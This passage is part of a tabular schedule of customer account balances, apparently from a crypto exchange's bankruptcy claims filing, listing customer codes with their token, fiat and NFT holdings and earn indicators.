| 07333144 | | BRZ[5.07952967], CUSDT[5], DOGE[0], GRT[0], SUSHI[0.43256767], USD[0.00], USDT[1.09268598] | Yes | |
| 07333145 | | USD[10.97] | Yes | |
| 07333147 | | BRZ[1], DOGE[1], TRX[1], UNI[5.62545432], USD[43.32] | Yes | |
| 07333148 | | DOGE[0], USD[0.00] | | |
| 07333149 | | USD[10.00] | | |
| 07333150 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333152 | | CUSDT[1], USD[0.00] | | |
| 07333153 | | BRZ[1], BTC[.00088046], CUSDT[3], DOGE[211.61458775], GRT[1], SHIB[1437607.82058654], TRX[4], USD[0.01] | | |
| 07333154 | | USD[0.00] | | |
| 07333155 | | BRZ[1], BTC[.04147049], CUSDT[2], TRX[203.69917503], USD[0.00] | | |
| 07333156 | | USD[10.00] | | |
| 07333157 | | USD[10.00] | | |
| 07333158 | | AAVE[0.00000105], DOGE[0], ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07333159 | | DOGE[1319.7], USD[0.03] | | |
| 07333160 | | USD[10.00] | | |
| 07333161 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07333162 | | DOGE[115.39365924], KSHIB[7452.528727], SHIB[6436348.3945235], TRX[4], USD[0.00] | | |
| 07333163 | | TRX[59.183047], USD[0.00] | | |
| 07333164 | | USD[10.00] | | |
| 07333166 | | BAT[1], BRZ[4], CUSDT[10], DOGE[3], TRX[6], USD[0.01] | | |
| 07333167 | | USD[10.00] | | |
| 07333169 | | USD[10.00] | | |
| 07333170 | | ETH[.0039848], ETHW[.0039848], USD[0.67] | | |
| 07333171 | | BTC[.00126192], CUSDT[2], DOGE[118.64350907], SHIB[264515.27575717], TRX[3], USD[0.00] | | |
| 07333172 | | USD[10.00] | | |
| 07333173 | | BRZ[2], CUSDT[4], ETH[4.57896466], ETHW[4.57896466], GRT[1], SUSHI[1], TRX[4], USD[0.00], USDT[1] | | |
| 07333174 | | USD[10.00] | | |
| 07333175 | | USD[10.00] | | |
| 07333176 | | USD[11.02] | Yes | |
| 07333177 | | CUSDT[1], USD[0.00] | | |
| 07333178 | | USD[10.00] | | |
| 07333179 | | USD[10.00] | | |
| 07333180 | | USD[10.00] | | |
| 07333181 | | USD[10.00] | | |
| 07333182 | | USD[10.00] | | |
| 07333183 | | USD[10.00] | | |
| 07333184 | | USD[10.00] | | |
| 07333185 | | USD[10.00] | | |
| 07333186 | | USD[10.00] | | |
| 07333187 | | USD[0.00] | | |
| 07333188 | | USD[10.00] | | |
| 07333189 | | BTC[.00577897], CUSDT[6], DOGE[7565.48512553], TRX[1], USD[2.12] | Yes | |
| 07333190 | | BAT[1.01572382], BTC[.04996181], CUSDT[6], DOGE[2747.91753009], ETH[.23318088], ETHW[.23297853], SOL[40.14226263], TRX[7838.31885122], USD[0.00] | Yes | |
| 07333191 | | DOGE[613.68027362], USD[264.00] | | |
| 07333192 | | BRZ[4], BTC[.00000001], CUSDT[3], DOGE[2], ETHW[.01119075], SHIB[1504.09535921], USD[170.46], USDT[1.02543198] | Yes | |
| 07333193 | | USD[10.00] | | |
| 07333194 | | USD[10.00] | | |
| 07333196 | | CUSDT[6], DOGE[.38267405], TRX[2], USD[57.50] | | |
| 07333198 | | USD[0.00] | | |
| 07333199 | | DOGE[6148.45728227], TRX[1], USD[0.00] | | |
| 07333200 | | USD[10.00] | | |
| 07333201 | | BRZ[1], CUSDT[3], DOGE[5598.14344065], GRT[113.502924], SOL[44.0212682], TRX[3403.29026101], USD[0.00] | Yes | |
| 07333202 | | BTC[0], LINK[0], NFT [53813759550150216Z/SOL Parasite #2929][1], SOL[0], USD[0.00], USDT[0.00000145] | | |
| 07333203 | | USD[10.00] | | |
| 07333204 | | USD[10.00] | | |
| 07333205 | | USD[10.00] | | |
| 07333207 | | USD[10.00] | | |
| 07333208 | | DOGE[141.66129888], USD[0.00] | | |
| 07333209 | | BTC[0], DOGE[0.15745900], ETH[0], LTC[0], SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07333210 | | USD[10.00] | | |
| 07333211 | | DOGE[284.57861465], USD[10.00] | | |
| 07333212 | | USD[10.00] | | |
| 07333213 | | USD[159.01] | | |
| 07333214 | | CUSDT[4], DOGE[.74709184], GRT[1], TRX[3], USD[34.91] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333215 | | USD[10.00] | | |
| 07333217 | | BRZ[2], CUSDT[1], DOGE[.40583941], TRX[1], USD[0.78] | | |
| 07333218 | | BTC[.00000115], DOGE[4579.82891963], ETH[.07812047], ETHW[.07715058], TRX[2], USD[-90.62] | Yes | |
| 07333219 | | DOGE[.517], USD[0.70], USDT[.00004] | | |
| 07333220 | | USD[10.00] | | |
| 07333221 | | USD[10.00] | | |
| 07333222 | | TRX[.000001], USD[0.03] | | |
| 07333223 | | USD[10.00] | | |
| 07333224 | | CUSDT[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07333226 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07333227 | | BTC[0], USD[0.00] | | |
| 07333228 | | CUSDT[1], DOGE[650.0764658], TRX[2], USD[8.87] | | |
| 07333229 | | CUSDT[1], USD[2.69] | | |
| 07333230 | | USD[10.00] | | |
| 07333231 | | BTC[0], USD[0.13] | | |
| 07333233 | | USD[0.00], USDT[0.00000001] | | |
| 07333234 | | USD[10.00] | | |
| 07333236 | | USD[10.00] | | |
| 07333237 | | USD[10.00] | | |
| 07333238 | | DOGE[.00016156], ETH[.00000307], ETHW[.00000307], USD[0.00] | | |
| 07333239 | | BRZ[4], BTC[0.00000012], CUSDT[4], DOGE[3], GRT[2.00498957], SHIB[3], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07333240 | | DOGE[56469.51465016], GRT[1], USD[10.00] | | |
| 07333241 | | DOGE[1], USD[0.00] | | |
| 07333242 | | BAT[1.0165555], BRZ[3], BTC[.00000021], CUSDT[10], DOGE[6.98118866], GRT[1.00019173], SOL[.00004418], TRX[10.07746716], USD[0.24], USDT[2.18377586] | Yes | |
| 07333243 | | BRZ[1], CUSDT[6], GRT[1], TRX[5], USD[0.00] | | |
| 07333244 | | USD[10.00] | | |
| 07333245 | | CUSDT[1], DOGE[0], TRX[2], USD[10.00], USDT[1] | | |
| 07333246 | | KSHIB[179.15223371], USD[0.00] | | |
| 07333247 | | CUSDT[2], DOGE[126.65799644], TRX[1], USD[0.00] | | |
| 07333248 | | USD[10.00] | | |
| 07333249 | | CUSDT[4], ETH[0], ETHW[0.05931088], SUSHI[2.85505833], UNI[1.68911072], USD[0.00], USDT[0] | Yes | |
| 07333250 | | BAT[1], BRZ[1], CUSDT[1], TRX[5], USD[0.90], USDT[1] | | |
| 07333251 | | USD[10.00] | | |
| 07333252 | | USD[10.00] | | |
| 07333253 | | USD[10.00] | | |
| 07333254 | | USD[10.00] | | |
| 07333255 | | DOGE[0], USD[0.01] | | |
| 07333256 | | BTC[.00070718], CUSDT[2], DOGE[.0560331], SHIB[1], SUSHI[2.02918693], TRX[1], USD[0.01] | Yes | |
| 07333257 | | BAT[16.64917309], BRZ[32.19723058], CUSDT[69.76859438], DOGE[1203.97064797], ETH[.02421371], ETHW[.02391253], GRT[.00111498], SHIB[2733634.85854768], SOL[.00004366], TRX[184.60361041], USD[0.00], USDT[6.65119693] | Yes | |
| 07333258 | | USD[0.00] | | |
| 07333259 | | CUSDT[1], TRX[210.94763372], USD[0.00] | | |
| 07333260 | | BAT[0], BRZ[0], DOGE[0], GRT[0], USD[0.00], USDT[0.00000001] | | |
| 07333261 | | USD[10.00] | | |
| 07333263 | | DOGE[111.87225809] | | |
| 07333264 | | CUSDT[4], USD[0.00] | Yes | |
| 07333265 | | USD[10.00] | | |
| 07333266 | | DOGE[14.93509164], USD[0.00] | | |
| 07333267 | | USD[10.00] | | |
| 07333269 | | BRZ[.823], CUSDT[2], DOGE[4.09469849], TRX[.946], USD[0.05] | | |
| 07333270 | | CUSDT[1], DOGE[148.23863433], TRX[1], USD[3.32] | | |
| 07333271 | | USD[10.00] | | |
| 07333272 | | USD[10.00] | | |
| 07333273 | | BTC[.00112657], CUSDT[1], DOGE[967.09680848], ETH[.01261624], ETHW[.01261624], TRX[3], USD[0.56] | | |
| 07333274 | | USD[0.00] | | |
| 07333276 | | USD[10.00] | | |
| 07333277 | | BTC[.000565], CUSDT[2], DOGE[0], SHIB[1], USD[23.03] | | |
| 07333278 | | USD[10.00] | | |
| 07333279 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333280 | | USD[10.00] | | |
| 07333281 | | USD[10.00] | | |
| 07333282 | | USD[10.00] | | |
| 07333283 | | USD[10.00] | | |
| 07333284 | | BTC[.00505063], DOGE[4], ETH[.04944325], ETHW[.04944325], UNI[.9835076], USD[0.96] | | |
| 07333286 | | ETH[.00553506], ETHW[.00553506], USD[0.00] | | |
| 07333287 | | USD[10.00] | | |
| 07333289 | | DOGE[181.20170697], USD[0.00] | | |
| 07333290 | | TRX[147.67335503], USD[0.00] | | |
| 07333291 | | USD[10.00] | | |
| 07333292 | | SOL[1.20875], USD[0.00] | | |
| 07333293 | | USD[10.00] | | |
| 07333294 | | BAT[1], BRZ[1], BTC[.03058567], CUSDT[1], DOGE[30761.2205261], TRX[4], USD[9.32] | | |
| 07333295 | | CUSDT[1], DOGE[71.97223215], USD[0.00] | | |
| 07333296 | | USD[10.00] | | |
| 07333299 | | USD[10.00] | | |
| 07333300 | | USD[10.00] | | |
| 07333301 | | CUSDT[3], USD[0.01] | | |
| 07333302 | | USD[0.87] | Yes | |
| 07333304 | | DOGE[.05301293], USD[0.01] | | |
| 07333305 | | USD[10.00] | | |
| 07333307 | | BRZ[2], BTC[.04280574], CUSDT[16], DOGE[13222.13150044], ETH[1.45118008], ETHW[1.45057058], MATIC[69.13703905], TRX[7], USD[63.90], USDT[2.19055049] | Yes | |
| 07333308 | | BRZ[2], BTC[0], CUSDT[11], DOGE[1.00792490], GRT[1], TRX[6], USD[0.00] | Yes | |
| 07333309 | | CUSDT[2], GRT[1.00498957], TRX[2], USD[0.00] | Yes | |
| 07333310 | | USD[0.00] | Yes | |
| 07333311 | | BTC[.0000597], DOGE[23.20596409], USD[0.00] | | |
| 07333312 | | USD[10.00] | | |
| 07333313 | | USD[10.00] | | |
| 07333314 | | USD[10.00] | | |
| 07333315 | | CUSDT[6], SHIB[48198787.90240559], SOL[16.28304178], TRX[3], USD[22.81] | Yes | |
| 07333316 | | BRZ[0], USD[10.01] | | |
| 07333317 | | DOGE[1125.93104816], ETH[.00754415], ETHW[.00754415], USD[0.00] | | |
| 07333318 | | USD[10.00] | | |
| 07333319 | | TRX[1], USD[0.00] | | |
| 07333320 | | CUSDT[1], DOGE[1], USD[0.99] | | |
| 07333321 | | USD[0.00] | | |
| 07333322 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07333323 | | CUSDT[4], DOGE[3], SOL[0], USD[691.58], USDT[1.10787857] | Yes | |
| 07333324 | | USD[10.00] | | |
| 07333325 | | USD[10.00] | | |
| 07333326 | | DOGE[131.65686744], USD[0.00] | | |
| 07333327 | | DOGE[1], USD[0.00] | | |
| 07333328 | | AUD[0.32], BAT[32.90745492], BRZ[16.02673772], BTC[.00000723], DOGE[848.65354541], ETH[.01618854], ETHW[.01618854], GRT[2.03579353], LINK[.05134648], LTC[.0018665], SGD[1.31], SOL[.46444428], SUSHI[.28366794], TRX[156.78026023], USD[0.88], USDT[.99011689] | | |
| 07333329 | | USD[10.00] | | |
| 07333330 | | USD[10.00] | | |
| 07333331 | | CUSDT[2], DOGE[3.71650873], TRX[1], USD[0.01] | | |
| 07333332 | | BF_POINT[200], BRZ[13.9297674], CUSDT[11.91995386], DOGE[11.038594], ETH[.00002469], ETHW[.00002469], GRT[.69147889], SHIB[9], SOL[.00013212], TRX[6.01808856], USD[154.06], USDT[1.82796539] | Yes | |
| 07333333 | | USD[10.00] | | |
| 07333334 | | BRZ[1], DOGE[.00166277], ETH[.00380563], ETHW[.00376459], SHIB[1], TRX[3], USD[0.85] | Yes | |
| 07333335 | | BRZ[2], BTC[0], CUSDT[3], DOGE[0], ETH[0], SOL[.00111697], TRX[1], USD[0.00] | | |
| 07333336 | | BRZ[3], CUSDT[12], DOGE[2], ETH[.00000001], ETHW[0], SHIB[1], TRX[9], USD[0.00], USDT[3] | | |
| 07333337 | | CUSDT[16], USD[0.01] | | |
| 07333338 | | USD[10.00] | | |
| 07333339 | | BCH[.02011213], CUSDT[1], LTC[.04288946], USD[0.00] | | |
| 07333340 | | USD[10.00] | | |
| 07333341 | | USD[10.00] | | |
| 07333342 | | USD[0.00] | | |
| 07333343 | | ETH[.0052486], ETHW[.0052486], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333344 | | CUSDT[3801.2088003], DOGE[1.89420995], TRX[810.69488494], USD[5.86] | | |
| 07333345 | | TRX[1], USD[0.00] | | |
| 07333346 | | BRZ[3], CUSDT[3], SHIB[2], TRX[1], USD[0.45] | | |
| 07333347 | | USD[10.00] | | |
| 07333348 | | BTC[.00000797], USD[0.00] | | |
| 07333349 | | CUSDT[1], DOGE[.00002686], SHIB[727434.1289139], USD[0.01] | Yes | |
| 07333350 | | USD[10.00] | | |
| 07333351 | | GRT[1], TRX[1], USD[0.01] | | |
| 07333352 | | USD[10.00] | | |
| 07333353 | | USD[10.00] | | |
| 07333354 | | DOGE[548.77648909], NFT [490830463704114218/Rubber Duckie #0086 - 2K][1], TRX[1], USD[4.75] | | |
| 07333355 | | DOGE[783.27335097], USD[11.09] | Yes | |
| 07333356 | | BRZ[1], CUSDT[10], DOGE[.00360823], TRX[10.06486703], USD[0.00], USDT[1.10321400] | Yes | |
| 07333357 | | CUSDT[3], DOGE[1], ETH[.85918902], ETHW[.85918902], GRT[1], SOL[1], TRX[2], USD[0.00] | | |
| 07333358 | | BAT[1], CUSDT[1], USD[0.00] | | |
| 07333359 | | CUSDT[2], USD[0.00] | | |
| 07333360 | | USD[10.00] | | |
| 07333361 | | DOGE[139.40775681], USD[0.00] | | |
| 07333362 | | CUSDT[2], DOGE[1], TRX[3], USD[0.01] | | |
| 07333363 | | CUSDT[6], GRT[1], TRX[63.26221479], USD[0.57], USDT[1] | | |
| 07333364 | | CUSDT[3], ETH[.00692785], ETHW[.00692785], MATIC[76.47683892], SHIB[2222815.31188043], TRX[2], USD[0.00] | | |
| 07333365 | | USD[10.00] | | |
| 07333366 | | CUSDT[2], TRX[1], USD[0.06] | | |
| 07333367 | | USD[10.00] | | |
| 07333368 | | USD[10.00] | | |
| 07333369 | | USD[10.00] | | |
| 07333370 | | USD[10.00] | | |
| 07333371 | | DOGE[637.87305708], USD[79.49] | | |
| 07333372 | | DOGE[0], USD[0.00] | | |
| 07333373 | | BRZ[2], BTC[0], CUSDT[5], DOGE[1], LTC[0], TRX[4], USD[0.00] | | |
| 07333374 | | USD[10.00] | | |
| 07333376 | | USD[0.00] | | |
| 07333377 | | USD[10.00] | | |
| 07333379 | | USD[0.00], USDT[0] | Yes | |
| 07333380 | | BF_POINT[300], BTC[.01004362], DOGE[784.1715034], GRT[0], SHIB[3], SOL[.00410545], TRX[293.76781083], USD[0.00] | Yes | |
| 07333381 | | USD[10.00] | | |
| 07333383 | | BRZ[2], BTC[.011755667], CUSDT[5], DOGE[1829.19176178], ETH[0], GRT[1], TRX[110.22287645], USD[1.10] | | |
| 07333384 | | BRZ[3], BTC[0], ETHW[1.09831647], LINK[3.75258077], SHIB[18601369.78325414], TRX[25.01285096], USD[1.86], USDT[0] | Yes | |
| 07333385 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07333386 | | USD[10.00] | | |
| 07333387 | | CUSDT[1], DOGE[3228.56427038], USD[10.00] | | |
| 07333388 | | USD[10.00] | | |
| 07333389 | | DOGE[126.55092909], USD[0.00] | | |
| 07333390 | | DOGE[1.05617014], USD[0.00] | | |
| 07333391 | | USD[10.00] | | |
| 07333392 | | USD[10.00] | | |
| 07333393 | | BTC[.0059697], DOGE[838.586], ETH[.026516], ETHW[.026516], LINK[2.1912], UNI[1.39], USD[2.01] | | |
| 07333394 | | USD[10.00] | | |
| 07333395 | | BRZ[1], DOGE[10.00001936], LINK[2.80613762], TRX[2], USD[25.71] | | |
| 07333396 | | DOGE[137.45264051], USD[0.00] | Yes | |
| 07333397 | | CUSDT[2], DOGE[278.97478817], USD[0.00] | | |
| 07333398 | | MATIC[0.00000001], USD[0.00] | | |
| 07333400 | | USD[10.00] | | |
| 07333401 | | BTC[0], DOGE[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | | |
| 07333402 | | BTC[.00023784], USD[0.00] | | |
| 07333403 | | TRX[1], USD[0.01] | | |
| 07333404 | | USD[10.00] | | |
| 07333405 | | BRZ[1], CUSDT[1], DOGE[6550.58031972], LINK[2.70702574], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333407 | | USD[10.00] | | |
| 07333408 | | USD[0.00] | | |
| 07333409 | | BAT[4.20374665], BRZ[1], CUSDT[1695.96837544], DOGE[2161.73417301], ETH[.04357275], ETHW[.04357275], KSHIB[513.111233], LINK[2.34789790], SHIB[3883019.3909275], TRX[585.36326442], USD[0.00], USDT[1] | | |
| 07333410 | | USD[0.00] | | |
| 07333411 | | BRZ[1], CUSDT[2], USD[0.01] | Yes | |
| 07333412 | | DOGE[85.28345805], USD[12.00] | | |
| 07333413 | | DOGE[1018.60847483], USD[0.00] | | |
| 07333414 | | USD[10.00] | | |
| 07333415 | | BAT[1], CUSDT[1], ETH[0], TRX[1], USD[0.00] | | |
| 07333416 | | USD[0.00] | Yes | |
| 07333417 | | USD[10.00] | | |
| 07333418 | | TRX[123.03412991], USD[0.00] | | |
| 07333420 | | USD[10.00] | | |
| 07333421 | | USD[10.00] | | |
| 07333422 | | USD[0.01] | | |
| 07333423 | | CUSDT[1], DOGE[2569.47085868], ETH[0], ETHW[0], SOL[0], TRX[32867.99196669], USD[0.00], USDT[0] | Yes | |
| 07333424 | | USD[0.00] | | |
| 07333425 | | BTC[.00020846], CUSDT[1], DOGE[2], ETH[.11126274], ETHW[.11126274], LINK[1.71786631], USD[0.00] | | |
| 07333426 | | USD[10.00] | | |
| 07333427 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07333428 | | USD[10.00] | | |
| 07333429 | | USD[10.00] | | |
| 07333430 | | CUSDT[3], DOGE[5904.30793807], TRX[1], USD[0.00] | | |
| 07333431 | | USD[10.00] | | |
| 07333432 | | DOGE[0], USD[0.17] | | |
| 07333433 | | TRX[67.17334626], USD[0.00] | | |
| 07333434 | | BRZ[1], CUSDT[8], TRX[1], USD[0.00] | Yes | |
| 07333435 | | MATIC[7.0568887], USD[0.00] | Yes | |
| 07333436 | | BRZ[1], BTC[0], CUSDT[4], DOGE[117.95174800], USD[0.35] | | |
| 07333437 | | BTC[.00176532], CUSDT[1], DOGE[1], TRX[3], USD[0.00] | | |
| 07333438 | | CUSDT[1], DOGE[.0000033], TRX[2], USD[0.54] | | |
| 07333439 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07333440 | | USD[0.00] | | |
| 07333442 | | USD[10.00] | | |
| 07333443 | | BRZ[1], CUSDT[2], DOGE[327.61396722], ETH[0], TRX[2507.39921779], USD[0.00] | Yes | |
| 07333444 | | DOGE[1], TRX[1], USD[0.47] | | |
| 07333445 | | CUSDT[.00002574], DOGE[5845.58488981], USD[0.00] | | |
| 07333446 | | USD[10.00] | | |
| 07333447 | | BRZ[0], BTC[0], LINK[0], USD[0.00] | | |
| 07333448 | | USD[10.00] | | |
| 07333449 | | DOGE[1], USD[0.00] | | |
| 07333450 | | DOGE[9.46146819], USD[0.08] | | |
| 07333451 | | CUSDT[1], DOGE[0], USD[0.00] | Yes | |
| 07333452 | | USD[10.00] | | |
| 07333453 | | DOGE[743.42549506], USD[0.00] | | |
| 07333454 | | DOGE[136.47882449], USD[0.00] | | |
| 07333455 | | USD[10.00] | | |
| 07333456 | | USD[10.00] | | |
| 07333457 | | USD[10.00] | | |
| 07333458 | | USD[10.00] | | |
| 07333459 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07333460 | | CUSDT[1], TRX[3], USD[67.71] | | |
| 07333462 | | DOGE[171.17273553], USD[0.00] | | |
| 07333463 | | BCH[0], ETH[0], GRT[7.62866153], SUSHI[0], USD[0.00] | Yes | |
| 07333464 | | USD[10.00] | | |
| 07333465 | | DOGE[0.83139470], USD[0.00] | | |
| 07333466 | | DOGE[422.304], USD[0.24] | | |
| 07333467 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333468 | | USD[10.00] | | |
| 07333469 | | DOGE[5], TRX[2], USD[0.01] | | |
| 07333470 | | USD[10.00] | | |
| 07333471 | | USD[0.00] | | |
| 07333472 | | TRX[173.91357713], USD[0.00] | | |
| 07333473 | | DOGE[132.87592126], USD[0.00] | | |
| 07333474 | | USD[10.00] | | |
| 07333475 | | DOGE[215.86565039], USD[0.00] | | |
| 07333478 | | USD[0.00] | | |
| 07333479 | | BTC[.00020398], DOGE[1099.03925874], USD[0.00] | | |
| 07333480 | | CUSDT[1], LTC[0], USD[0.00] | | |
| 07333481 | | DAI[0], DOGE[0], USD[0.00] | Yes | |
| 07333482 | | BAT[3.27333702], BRZ[1.815], CUSDT[7], DOGE[0], TRX[6.67857081], USD[0.00] | Yes | |
| 07333483 | | CUSDT[1], DOGE[22516.01360763], USD[0.00] | | |
| 07333484 | | USD[0.00] | | |
| 07333485 | | USD[10.00] | | |
| 07333486 | | BRZ[1], CUSDT[4], ETH[.00588818], ETHW[.00588818], TRX[2], USD[0.01] | | |
| 07333487 | | DOGE[11337.37383381], USD[0.00], USDT[0.00000001] | | |
| 07333488 | | USD[10.00] | | |
| 07333489 | | USD[10.00] | | |
| 07333490 | | BRZ[1], DOGE[2.00001295], ETH[.00165226], ETHW[.00165226], TRX[1], USD[0.51] | | |
| 07333491 | | BTC[0], CUSDT[2], DOGE[.00022573], ETH[0], SOL[0], USD[0.00] | | |
| 07333493 | | BAT[1], CUSDT[1], USD[0.35] | | |
| 07333494 | | USD[10.00] | | |
| 07333495 | | NFT (346002305881723980/Australia Ticket Stub #2196)[1], NFT (370813169029931278/Golden Retriever Common #240)[1], NFT (537609080737813463/Dalmatian Common #429)[1], NFT (573531149907677309/Dalmatian Common #474)[1], SHIB[53950.8806914], SOL[0], USD[0.13] | Yes | |
| 07333496 | | DOGE[1270.52307689], TRX[1], USD[10.00] | | |
| 07333497 | | USD[0.01], USDT[0.00000001] | | |
| 07333498 | | USD[10.00] | | |
| 07333499 | | USD[10.00] | | |
| 07333500 | | USD[10.00] | | |
| 07333501 | | USD[10.00] | | |
| 07333502 | | USD[10.00] | | |
| 07333503 | | LTC[.06051607], USD[0.00] | Yes | |
| 07333504 | | DOGE[113.69604846], USD[10.00] | | |
| 07333505 | | CUSDT[636.0466749], USD[0.00] | Yes | |
| 07333506 | | CUSDT[1], DOGE[15434.55654038], SHIB[3029034.20272993], TRX[1], USD[11.10] | Yes | |
| 07333507 | | USD[10.00] | | |
| 07333508 | | USD[10.00] | | |
| 07333509 | | USD[10.00] | | |
| 07333510 | | CUSDT[7], TRX[1], USD[0.02], USDT[0] | Yes | |
| 07333511 | | USD[10.00] | | |
| 07333512 | | USD[10.00] | | |
| 07333513 | | SHIB[1255.64453125], USD[0.00] | Yes | |
| 07333514 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07333515 | | USD[10.00] | | |
| 07333516 | | USD[10.00] | | |
| 07333517 | | CUSDT[1], DOGE[3], ETH[0], TRX[1], USD[0.01] | | |
| 07333518 | | USD[10.00] | | |
| 07333519 | | BRZ[3], CUSDT[3], DOGE[0], ETH[0], SUSHI[0], TRX[1], UNI[0], USD[0.00] | | |
| 07333520 | | USD[10.00] | | |
| 07333521 | | USD[10.00] | | |
| 07333522 | | USD[10.00] | | |
| 07333524 | | CUSDT[2], USD[0.01] | | |
| 07333525 | | USD[10.00] | | |
| 07333526 | | USD[10.00] | | |
| 07333527 | | CUSDT[2], DOGE[180.55465318], TRX[1], USD[0.00] | | |
| 07333528 | | CUSDT[1], USD[0.00] | | |
| 07333529 | | BRZ[0], DOGE[0], USD[0.13], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333530 | | BRZ[1], BTC[0], DOGE[1], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07333533 | | TRX[1], USD[0.01] | | |
| 07333534 | | USD[10.00] | | |
| 07333536 | | TRX[1], USD[0.01] | | |
| 07333537 | | CUSDT[2], DOGE[376.68480676], ETH[0.04410461], ETHW[0.04410461], USD[0.00] | | |
| 07333538 | | BRZ[1], CUSDT[4], DOGE[0.02661346], TRX[2], USD[0.39] | | |
| 07333539 | | BTC[.00705781], DOGE[8002.38594055], ETH[.11283278], ETHW[.11283278], GRT[36.47995596], LTC[.60760598], SOL[18.6635259], SUSHI[45.08430358], UNI[2.8179459], USD[0.00], USDT[0] | | |
| 07333540 | | USD[10.00] | | |
| 07333541 | | BTC[0], DOGE[2], GRT[0], LINK[0], SOL[0], TRX[7.16787791], UNI[0], USD[0.00] | Yes | |
| 07333542 | | CUSDT[1], DOGE[.56671426], USD[136.30] | | |
| 07333543 | | TRX[2], USD[0.00] | | |
| 07333544 | | CUSDT[3], DOGE[3080.16595012], SHIB[777536.24741201], TRX[2090.3890378], USD[0.00] | Yes | |
| 07333545 | | USD[10.00] | | |
| 07333546 | | DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07333547 | | CUSDT[2], LTC[.92988543], SOL[2.56927619], USD[0.00] | Yes | |
| 07333548 | | CUSDT[1], GRT[1], USD[0.00], USDT[0] | | |
| 07333549 | | USD[0.01] | | |
| 07333550 | | USD[10.00] | | |
| 07333551 | | USD[10.00] | | |
| 07333553 | | USD[10.00] | | |
| 07333555 | | BAT[2.12866258], BRZ[10.80170025], BTC[0], CUSDT[11], DOGE[4], ETH[0], GRT[2.0009683], KSHIB[0], SHIB[6], SOL[0], TRX[28.32126864], USD[0.01], USDT[0] | Yes | |
| 07333557 | | USD[10.00] | | |
| 07333558 | | BRZ[1], BTC[0.01067362], CUSDT[3], DOGE[1521.07638960], ETH[0.14844949], ETHW[0.14759843], GRT[1.00313735], USD[0.00] | Yes | |
| 07333560 | | USD[10.00] | | |
| 07333561 | | DOGE[16.91085542], USD[0.00] | | |
| 07333562 | | CUSDT[3], DOGE[63.47338347], TRX[1], USD[1.19] | | |
| 07333563 | | DOGE[5390.82498925], SHIB[49406.76449736], USD[0.00] | Yes | |
| 07333564 | | BRZ[1], CUSDT[1.00014456], DOGE[15], USD[0.00] | | |
| 07333565 | | USD[10.00] | | |
| 07333566 | | USD[10.00] | | |
| 07333567 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07333568 | | CUSDT[5], DOGE[3.38516758], USD[0.13] | | |
| 07333569 | | DOGE[ 94750537], TRX[1], USD[0.00] | | |
| 07333570 | | USD[10.00] | | |
| 07333571 | | CUSDT[1], USD[0.01] | | |
| 07333572 | | CUSDT[1], DOGE[997.32780974], TRX[1], USD[0.00] | | |
| 07333573 | | USD[0.00] | | |
| 07333574 | | USD[10.00] | | |
| 07333575 | | USD[10.00] | | |
| 07333576 | | CUSDT[3], DOGE[4530.08324309], ETH[.50116632], ETHW[.50116632], TRX[1], USD[0.00] | | |
| 07333577 | | DOGE[0], USD[0.00] | | |
| 07333578 | | ETH[.0000624], ETHW[.0000624], USD[0.00] | Yes | |
| 07333579 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01] | | |
| 07333580 | | USD[10.00] | | |
| 07333581 | | CUSDT[1], DOGE[2641.26730398], SHIB[1], SOL[2.91267976], USD[0.05] | Yes | |
| 07333582 | | USD[10.00] | | |
| 07333583 | | USD[10.00] | | |
| 07333584 | | USD[0.00] | | |
| 07333585 | | USD[10.00] | | |
| 07333586 | | DOGE[160.90070111], USD[0.00] | | |
| 07333587 | | CUSDT[1], DOGE[471.23524082], TRX[2], USD[0.00] | | |
| 07333588 | | USD[10.00] | | |
| 07333589 | | BRZ[0], TRX[1], USD[0.00], USDT[0] | | |
| 07333590 | | CUSDT[9], USD[0.01] | Yes | |
| 07333591 | | USD[10.00] | | |
| 07333592 | | DOGE[135.40026348], SHIB[203210.72952651], USD[0.00] | | |
| 07333593 | | CUSDT[3], DOGE[9.65280624], ETH[.00008807], ETHW[.00008807], SHIB[1], TRX[.17354136], USD[45.71] | | |
| 07333594 | | USD[10.00] | | |

